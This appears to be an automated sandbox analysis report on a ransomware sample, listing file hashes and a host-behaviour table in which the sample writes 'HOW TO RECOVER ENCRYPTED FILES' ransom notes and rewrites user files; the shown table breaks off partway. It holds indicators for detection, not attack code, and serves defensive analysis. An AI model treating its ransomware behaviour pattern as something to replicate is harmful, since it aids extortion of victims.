SHA1: c93599ac3cca4a49eed73146b45f261710ca1055 SHA256: 7d64803991e38ffb0d832b5ae391dd83caa76619336612751b1604fdf9005938 SSDeep: 384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPi9:tbCWYFrewYTJCN |
|
|
| C:\588bce7c90097ed212\3076\LocalizedData.xml | 60.86 KB |
MD5:
7ed1a1e36fcb56c1f9faf3d4f49d288b
SHA1: 89aca9444dc4ed444a2780c7246fcb36d98b0ae0 SHA256: f3764facfc15ad4ea3587ceadcd3c74cf35a719bf3ea5f183b5136d1df5fb04f SSDeep: 1536:H0GD+K1f21qy6ZcOUI2Onxcaie1sDXnsQxntkU29Mr72oj+obbhYAy:H0GaK1fqqyQdnx1ysQxntoMrbTHy |
|
|
| C:\588bce7c90097ed212\3082\LocalizedData.xml | 78.12 KB |
MD5:
262313ac119ea9bf08730c8605e2b56f
SHA1: 74f3a1ac5da610c7c8339ca03cb74624c3d17e0a SHA256: de105784286f4d8f489b80aecac408d60fecebf51bbf4620281a252818c243b8 SSDeep: 1536:Xo/yYrDKRqvf+ffl0VMf/mfL94T+7j2JoiZe:Xo/yYrDKRqvf+feVMf/mfL94T+7j2Jre |
|
|
| C:\588bce7c90097ed212\3082\LocalizedData.xml | 80.56 KB |
MD5:
be1a7c8b8c592f018f5e5d40414e2e9c
SHA1: f5090a0855fee10235847d450810b268c4402494 SHA256: eb11fab0e5a0be1fb470d87e6e82c14b9287e04d297c16f12682bdc351971411 SSDeep: 1536:Kd0GPm/ExLTK+U08RRp+3XksiL6PlUodf0boxg4xz0eanZxl4rj2JoiZSy:KdpiExvmNv+3aL6PlUodtzxgZxSrj2J5 |
|
|
| C:\588bce7c90097ed212\Client\Parameterinfo.xml | 197.07 KB |
MD5:
84cb0278635f2882412c600eea7c41d5
SHA1: 5dba8c09501cc49097851be8ce50e5e25cc3c575 SHA256: 22a3f491ca1f94c71b111ecbaeff490e0ec4ece7d6bfe4fcc92f97d1093e744a SSDeep: 384:wYQH0RbAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKMNGIe9bE:w2RbYoVQTLTQTDFdPknZ13GpPcbrI/ |
|
|
| C:\588bce7c90097ed212\Client\UiInfo.xml | 39.60 KB |
MD5:
7dac6cf1b744caad6fedc1866d81a34c
SHA1: f21cfd481bee8a9b995ccb2bd1f1a4de4e8fd763 SHA256: efb5a1676b5ee754de1ad3f72f18d3956f1efe3ea8fc35d397641ca17619b4c9 SSDeep: 768:qQXWeWbuS+g0x8gJAOr6D2f16AJOwycITS0KNzmZnOfblYxhRGCzwoy:qvb1+ggFJAOeD2g6eWNNzYzxjFy |
|
|
| C:\588bce7c90097ed212\Extended\Parameterinfo.xml | 93.56 KB |
MD5:
b5a1bd3e01debdcbf3d1b656438c8a26
SHA1: 2dddaf5cf1385f48448e86b8b80e681616b9ee65 SHA256: 423c4a338b240e6140b1d69d3afffc70950b5ade50a0eb0dd2bb79a82e61e7d6 SSDeep: 1536:HW1vX9gxc5jd2PlhTAR3FWMC7OhNMQ287L2i7+CKdfH3kfr4IYy:HJc5KVAR1RWOw67ii75Vz4IYy |
|
|
| C:\588bce7c90097ed212\Extended\UiInfo.xml | 38.14 KB |
MD5:
103e3804aaf325e00ea83a30bdb78539
SHA1: 3435ecf2fdcd9c5fffd21ec766c9198deafe9d94 SHA256: 7a234e816f3cccf8334bd34df4c7704936977236cb53d984aa692bc70cf27508 SSDeep: 768:24URsd5vssgP7ZgZ/vSguJQvFQXvDINJh6Fuh3kr1UO0NWpPUb9cu+dOtOcOdOjw:24URsd5vsTPuZXQYQLIN/6Fuh3kr1UOT |
|
|
| C:\588bce7c90097ed212\Graphics\Print.ico | 1.12 KB |
MD5:
2cd7000aa52356b8762bf7ca7a2a776c
SHA1: c2580167d4d6700212e31bc89290ef478544d642 SHA256: 7201f67baeb0204274af3be27be1ee771b8e317919c2c65d6c00dcb37cd9a3dd SSDeep: 24:dOjNyw2aSGZHJi4U7Wf0mDX+QF7s/AemFAz:MjNyw/0NW9DOp/ANm |
|
|
| C:\588bce7c90097ed212\Graphics\Print.ico | 2.60 KB |
MD5:
a0f1ecd41dcf72bb179df7099012cb12
SHA1: e464a2ce23563aa49fdd918725a581cdcd16aa01 SHA256: bed975bb969561674b29931041273567ca60922d0d3bedb8f4da8dce58b1338a SSDeep: 48:kK8ieVm/u+WEua27zQYORpk1jxHsMvqxdJITSdqVUWeC6OtV0h6lrtsyGrXYEk:wrcW5a23NqkJxHShdDOQhSwX8 |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate1.ico | 2.35 KB |
MD5:
9488674c0ce164268bc4ce4f998993bb
SHA1: 2776f0b14b2468ace2225a98f7ddc92d0df6ec23 SHA256: 32564f533f99d3e07e6fdc0c23b82bb789c84d44bee28ae67986996405f4cc98 SSDeep: 48:DhL+f+t5+OzZVtA3OfAHNJITSdqVUWeC6OtV0h6lrtsyGrXYEk:NKf+t5+qZVXkbhdDOQhSwX8 |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate2.ico | 895 bytes |
MD5:
84601e0fe8a0927bea93a37406f572db
SHA1: ef35c2ef2d52b521678890a9eb4e859456ac52a7 SHA256: 3dd53e63ba082039274608e3a454aaa6e1194ea342a1bc97d068ec48b1ce659f SSDeep: 12:pmZX5+9wQaxWbwW3h/7eHzemn0iLHRp5U:Md5EaxWbh/Cnto |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate4.ico | 895 bytes |
MD5:
50126934c8aa542bd783d8a72675a64e
SHA1: 7303e7d0ec529f1d4ed8592264be70355ca44388 SHA256: 607334cb62090a9065333d9ac2f293a7976eb188cb3fb8e823eb396632e7d4f2 SSDeep: 6:kRK///FleTxml+SzNaoT9Q0/lHOmMdrYln8OUo/XRWl2XOXFBYpqnHp/p5U:p///FPwxUrMunUofRReFNHRp5U |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate5.ico | 895 bytes |
MD5:
acff277a7feb607c30ee50a6461d7361
SHA1: f670a616cc113afcbb4f9266d233f0a2c3fabcc7 SHA256: bf818036fdf1690cf1f83b678957420b9ac83360e6d83d58c479482f72d14943 SSDeep: 6:kRKi+Blqkl/QThulVDYa5a//ItEl/aotzauakg//5aM1lkl05Kaag2/JqnHp/p5U:pXBHehqSayIylrtBg/bk4AgzHRp5U |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate6.ico | 895 bytes |
MD5:
2bf69afea81db24e2af58c7aa2bee39c
SHA1: 9ba271980e12657f51c1575a6c34c0ab0df76f1a SHA256: 834b3f203a8951eb28d7d091b553393a9a08c514fefa27cd73795063865f9cc7 SSDeep: 12:pjs+/hlRwx5REHevtOkslTaGWOpRFkpRHkCHRp5U:tZ/u+HeilBh/F+Rdo |
|
|
| C:\588bce7c90097ed212\Graphics\Rotate7.ico | 895 bytes |
MD5:
d62a0f5f11b45f6108fa95bc87616d40
SHA1: 482589e9f5b8885511a2a18f88229dc6b17f9627 SHA256: 485fef60a642cee29b38e2f4d7c1d4871950ab07c3da6ef321eb76c3f473cbb6 SSDeep: 6:kRKIekllisUriJ2IP+eX8iDml8mS8+hlxllwqlllkg2klHYdpqnHp/p5U:p8os0iieX8iNVHX//x2sHYdoHRp5U |
|
|
| C:\588bce7c90097ed212\Graphics\Save.ico | 1.12 KB |
MD5:
88f6d7e4c6d665958c6f3f41f5bcb856
SHA1: 6550d6c7f9b091babeae84aa2c795436f076885c SHA256: 1e8cb3817768849489083be4d46fe2f2a8b6fd6e41edef33cb6d0a1420cb16b0 SSDeep: 24:Br5ckw0Pce/WPv42lPpJ2/BatY9Y4ollEKeKzl:h6kPccWPQS2UtEYFEKeq |
|
|
| C:\588bce7c90097ed212\Graphics\Setup.ico | 37.31 KB |
MD5:
05cd85a8a1c7887ab23f86b9302207d1
SHA1: ddb40d714989abface7952924355e671b97c0bc4 SHA256: f7c060f86a15de541256d84d233cd0b7f17e1ba54a8dcd4f54d987bc4fc8c53b SSDeep: 768:jDFVLBGJM13h1Veuv1yOibyhTToWjqrTwh4nE3mM8sAXOFUMvmkjQXSzvBRSy:jDnBh13hnv1yOAyhY3wht3mpsAXOFU+b |
|
|
| C:\588bce7c90097ed212\Graphics\stop.ico | 9.90 KB |
MD5:
a095e272b785b66a707689cdf367014a
SHA1: 19fb49e0c277e63099a1a98170b2794bbdc9d392 SHA256: 73396feaaf0bcaf872a78e35e10138bbb9fc4d59477e197cdeabdeaf47d2c826 SSDeep: 96:uC1kqWje1S/f1AXa0w+2ZM4xD02EuZkULqcA0zjrpthQ2Ngms9+LmODclhpjdfLX:JkqAFqroMS9lD9Ngr9+m7bxpXHT5ToYD |
|
|
| C:\588bce7c90097ed212\Graphics\stop.ico | 11.36 KB |
MD5:
c59b1fc50d01fb63bc13ae56f31fa81a
SHA1: 1eb2bfd50c8093106a35a59c0c989fbe77ad5948 SHA256: 6d76248c58a0f23ca5e57cc865de67003c83b5884e652de9db0332757cc43edf SSDeep: 192:K67KigHtFVNzUUkJmmxyECt8Zv4dPBnirWZNkbsSsdxryM8TFOdDRhSwX8:K6Qn8JmmsELv6PhirWXNSsdcM8TIvSf |
|
|
| C:\588bce7c90097ed212\Graphics\warn.ico | 11.36 KB |
MD5:
aca8b3f7d320c6bc9dcf99a272e6ad62
SHA1: 7a114ce4a3f38f95745d01c70edd8aeff2d8618d SHA256: 99cd4c89677ec97920ac9ad752e7b17c971736868db7f6ec4fb2eeb8291e76b1 SSDeep: 192:BW1pJVM15pdujFhv5aU3tOATzQJ7TSWzVt/ckJ69/N85ByFtJiMxZGrwdDRhSwX8:BWfbM1fsaassonSWpt5i/C5BAtUMzGrX |
|
|
| C:\Logs\Application.evtx | 68.00 KB |
MD5:
594173e25c434cd074ce4ce1e64cb57a
SHA1: 026850595874597e1277e9c0abf95d124a3f302e SHA256: 0fc64e3f02204e8846dc7944a4c512a98897439d40bd07317092044f80aa3f8e SSDeep: 768:xHIz8GFMIxEkigqJqAczhqbIkq6cqiqdqCIXIuqCLIHNI3R:48xIxEzcWcouR |
|
|
| C:\Logs\Application.evtx | 70.43 KB |
MD5:
99b4dfade4be377f560ccbad6c3b984b
SHA1: 3800ed3d091c62850c1d3a8ee6813e9a0317087b SHA256: c432210a1751637f5b802d1552e5722d6f73fbbe97a4f750632965b72fb71130 SSDeep: 1536:JJWq6Xwl6h0VT/L9AdyKFmmYNvfpitgBVleKQIy:JJWqewAgTz9AMNXV9Dy |
|
|
| C:\Logs\HardwareEvents.evtx | 70.43 KB |
MD5:
9d35a1315076b0c7db50c97898de7677
SHA1: f8ef4ba9b4cc627c5f47f1de2c18b32e096720a5 SHA256: c2b9a64fb2e4dfbe430d37a0b217f50b1e4a07d0a8b07fd07c6f2a27e407771f SSDeep: 1536:/y1tVkAN5cZ8J3VZxmQiygd8qAqybQxuP5mg0j71T7v1+Zy:/y1tRcmJF8y/+y0xMmhjRjay |
|
|
| C:\Logs\Internet Explorer.evtx | 70.43 KB |
MD5:
20a5096ea2bc5d9d43237332411b57ab
SHA1: aa45c4566f1810e70accb31d086b3f3e24f318ea SHA256: 1ada9c099293ecb9da7778f0e65a0012924c27f7319234576647b83a3f673cc6 SSDeep: 1536:PkXKkZSqpEsoQYZqClkuk88dpJjB6NoK8L5T3mMgkP7PBky:sfZS4ENQQkukhdp1INiL5TWU7PBky |
|
|
| C:\Logs\Key Management Service.evtx | 70.43 KB |
MD5:
dcb3bb4f1f59365bfef4e16e6209a2c2
SHA1: eef01f2a69ff42effcbcd0b4f58cc79817e22400 SHA256: d3ac471977b1f8b3ac364c4b79e6c680096b747014cb1f50803596dd0297b016 SSDeep: 1536:Eu1t//Cri/fozDFPvouOVoTdQHiKifiU/UdVZMN1zWuqQy:EaJB/G54uOWT+CsHdVZMN1zWuqQy |
|
|
| C:\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx | 70.43 KB |
MD5:
18a58b189fcd8f67d2c8952f614a3986
SHA1: 40673cd2f322e38655a01cc6ee78ccb15a5cb17f SHA256: b0e6fc32939b797f1f70d029535f9e10a301aae2ee4c3b876de770b681c71e52 SSDeep: 1536:hZ3vkBO+MvIrlcsaLpG/NxdDSZcnN6Pxgy:hpvGO+Mv8czI/Nxdaqy |
|
|
| C:\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | 70.43 KB |
MD5:
3fdbb5a461729319c465d94ab3b7a61c
SHA1: 5fca38419dd366f4b67b0e7700e5175a050f25f6 SHA256: f078fe0451c27b54e25e417180524ab119635dbcd38a5ddbf345194c65132e99 SSDeep: 1536:IVFgiBAn7GWP2ANr0LV1XRhP8nKwRXtQN/d2HaP0UcL7V3by:I4iwGSR2LV1XRgRiL2HhLxy |
|
|
| C:\Logs\Microsoft-Windows-AppLocker%4MSI and Script.evtx | 70.43 KB |
MD5:
32fe1c3d2b000b04c7992422684a2e4d
SHA1: 961a501942dfbb9147298e2172f4d73e9f018604 SHA256: 674a4439d9597c6a64d5ed719dc8414f4396cd5750d43f11d70652326c432197 SSDeep: 1536:Vbk9Hh4DV6dzcyaDTmUzBuBaAkJoAW2co/xy:J7B2cy45Qa/JXWn+xy |
|
|
| C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx | 70.43 KB |
MD5:
bdb597d9f488aa751bd8760b5d0ea27c
SHA1: 608782744396ef4587fb20b77a3df4b18493a643 SHA256: 13c5ecce6be6030ed3d40735411739459afb2379fb5769c5894f5c4dc3da90a2 SSDeep: 1536:Q5LCJaHKoVIW/e0af9VgTIE0O7R+60Q1oDrsuOwypy:Q5LSaTVT/yKIHsQQW4py |
|
|
| C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx | 70.43 KB |
MD5:
f9b7845d537b04a607bf327c440409bd
SHA1: 5fa61b6b36bbaf08fc7161b1b5321480f48681b4 SHA256: 7da851f14de06e671a30c4d8de2dabab050e03c9fc532adf1c2b457ed514bd49 SSDeep: 1536:nvoqCivevs9vJbLvzIGp0ts7VNRB7t+XQj7HTzubsDKeB+LZmy:nvr94sBh4Gp0t+VNRB7t+XYzzuMKe8Zx |
|
|
| C:\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx | 70.43 KB |
MD5:
e035b133881a23878be32cf0fd5f8165
SHA1: 3c4ab6353904c4b6ea243413cd7dee5d72544c18 SHA256: 59b0047901b9e204572bace30b34879811c5c863e7e8c87ab5830990b2df8e1f SSDeep: 1536:igEuZWi5zWB1/6dzMQE+/ecLORoHt2zLE+0KkBpG2oLoy:iWXaIzMQE+mcLczLj0PbWMy |
|
|
| C:\Logs\Microsoft-Windows-AppReadiness%4Operational.evtx | 1.07 MB |
MD5:
dd1e686a8c23c83623311bc7f2106724
SHA1: cfd40e74fe87f0a118a1e5bb8473a9951fa435f7 SHA256: 27e2e2bd98e7e2e1323f663419d4816beedbff39f1fc2e30baeb5e1a35d0ae41 SSDeep: 768:ut5eUJYnFP6TPSZR86f0FCaWc7BsivBDSBYHjPY7p+1/5TV0zx1N2aw:IJgdT07GivBDSyHjA/zx1m |
|
|
| C:\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx | 70.43 KB |
MD5:
0094f016b06ad419e9a46b15979fe9b9
SHA1: d331a17223e548711ddc3c2ae7907ddb2496b27b SHA256: 1824568aa80c277b7bb908036c28377ec91a212e7fc6c5686d07dfa70c82aab1 SSDeep: 1536:R5dbDPSPEj0+bej5SqvEjp/cGqKh+cyBwC2oEihxzvFi67y:tD6p+SVNo/3hc6piDrFiiy |
|
|
| C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx | 2.07 MB |
MD5:
0b2121c7e1296462d67c92a0383fe2e8
SHA1: c0f82f32baecf9e3ec9ce3d18cbc5075060a196c SHA256: 092baa8b90f961ab1c3eb7fbd284b7315c0b28c8be572186d34597043bad12aa SSDeep: 3072:yT8ZfIXU4bgUzJCANS7ebOKXQbwkqBYxbJ1OAzLU5vQ4LkTK2JNiHim5WN/jAQgw:U7cPT |
|
|
| C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx | 2.07 MB |
MD5:
532a81318b5e81fe34d2483655ca516d
SHA1: 7a0a79f771a3af43a13ca8468a3bc6b7e4426ea3 SHA256: bfe1f1f9495ae3eca0cf39c8c81bd7bdd05fda284fac88c6554c1b35306164b9 SSDeep: 3072:OUp8c83/bFH+3ZejVU4bgUzJCANS7ebOKXQbwkqBYxbJ1OAzLU5vQ4LkTK2JNiHe:OUp8QpiX7cPT3 |
|
|
| C:\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx | 68.00 KB |
MD5:
a98f8b670da2cf2a84726fe8e8d72ae4
SHA1: e6dee1accff693a3bd6ec9c29bf24004c5756058 SHA256: d1480583b6c4b493f4d5fc7b9c85c115e893afb639473c4847aa74984ab4a352 SSDeep: 384:VhM6FDIjFksFkkFkkFkAFk4Fk8FkIFkwFkQFkMFkIFkwFkgFkEFkUFkkFkAFkgF4:VFI2LjjfXbnPvrnP/DTjf/f7rXbb/b |
|
|
| C:\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx | 70.43 KB |
MD5:
4671dfa9bed0751fb25cc59ad591f4a9
SHA1: 1b3cd5f172df63fc47758df1605f71f25fdf237c SHA256: 98119ed6819f18f2a2cfa784b62d8c6febb3db35f6b2bdd92687bc19d4b5ddcd SSDeep: 1536:Iqxw3pejtT47/OKkh6o2N9wCc/te0vwU4sBi+tPf45r/12+uBy:I5ejt0/OKc6oSY/te0vwU4Ii+t45bk+Z |
|
|
| C:\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | 68.00 KB |
MD5:
97268b2ef398158044cb001b6851f447
SHA1: 1ec9b3b0bb1aff253c10854196ab2784fc0f80be SHA256: 16af22bafaf0905d333cb1d07e35208e3dfa2b212582b1a747c83dd986f3e277 SSDeep: 96:cdRNVaO8FoUy66eKmDfyPSy66oyP+Guy66rN9:SV7yjeQjDGujo |
|
|
| C:\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | 70.43 KB |
MD5:
2f898ae0f17af313e67a5b79313e99a4
SHA1: 026c8cfab319b11d13f7282512e5baedf21c34db SHA256: 7700ed9bdc269f8955c13fa9e0906c19818572a28f823ce8e8e14237f5894555 SSDeep: 1536:81gzJfrUM2MRh4u4wPqDkScqEhdLLe5j0y:u7MvRB4jVd0y |
|
|
| C:\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx | 68.00 KB |
MD5:
67e9181932f0b8a2eaee43d4223fbf3f
SHA1: 4008963dcc1f4ff049cc67c41e843a7eedbfed50 SHA256: 265e78297d11a9d3f24cf80bbf8f26771663232e0ec7d40461b3a807cdef6344 SSDeep: 48:Mtr1pW5lf0rP+AQNRBEZWTENO4bnBnzoMS1Y1/MKrelm1Y1Wgv6lI1Y1/twkKkIh:fRNVaO8FoMSGVMKrRGL7G9UD8xGQVD8 |
|
|
| C:\Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx | 68.00 KB |
MD5:
0cabc4dc0cd5862c703dad3d7438ace5
SHA1: 117b7143a1845da1a71a3a2eeb7b4c9d3647d7dc SHA256: 23214f4c011b5f6dcb97021c4a5656cfba4725258114e599a2286d2b98ed3159 SSDeep: 48:MtSWstlerP+MZQNRBEZWTENO4bpBY5oM2oSGrVSGr1TiclBLSGrVSGr1blXrSGrm:AKNVaO8OoE5V51Wo5V5195V51y5V51 |
|
|
Host Behavior
File (6409)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\93A52DE3.ghost | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\08fba4I6SOgK wgZq.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\08fba4I6SOgK wgZq.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\FD1HVy\Desktop\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\$WINRE_BACKUP_PARTITION.MARKER | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\bootmgr | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\BOOTNXT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\2lXdAqAoOvGcbUB.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\2lXdAqAoOvGcbUB.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\$GetCurrent\SafeOS\GetCurrentRollback.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\$GetCurrent\SafeOS\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\3isATBSPQ5 UOqmv.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\DHtmlHeader.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\===HOW TO RECOVER ENCRYPTED FILES===.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\588bce7c90097ed212\DisplayIcon.ico | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\3zlss.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\4xYyYJRwyB8L.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\5Ef169y9ix6rZ9.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\header.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\5y_4_NDHts5.csv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\netfx_Core.mzz | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\681YKRSA.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\netfx_Core_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\bmTX7T6qIPE71rpZx.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\netfx_Core_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\bOufW0KQ0BPVT9ZFU.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\netfx_Extended.mzz | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\CDs-SLlJt8Y2ch.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\netfx_Extended_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\CytKFPE5.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\netfx_Extended_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\D9LkZMc2p44kH.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\ParameterInfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\dwQA5BYJsvrvQJJF.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\RGB9RAST_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\dzog-jbn-C_t.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\RGB9Rast_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\E YwxqdawOFZHmgiXB.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\GAfOf.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\SetupUi.xsd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\GckNJj3t1Zdg4qa.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\SplashScreen.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\HA2nEiovwoU5yCpOBpKq.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Strings.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\hhkmX.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\UiInfo.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\iOcDO48n7le3j3NyLj.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\watermark.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\jKbkftkOwu.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Windows6.0-KB956250-v6001-x64.msu | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\nwBUAO5bJhvpWmYg0yk7.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Windows6.0-KB956250-v6001-x86.msu | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\FD1HVy\Desktop\OsnlHvY8Lt.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\588bce7c90097ed212\Windows6.1-KB958488-v6001-x64.msu | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
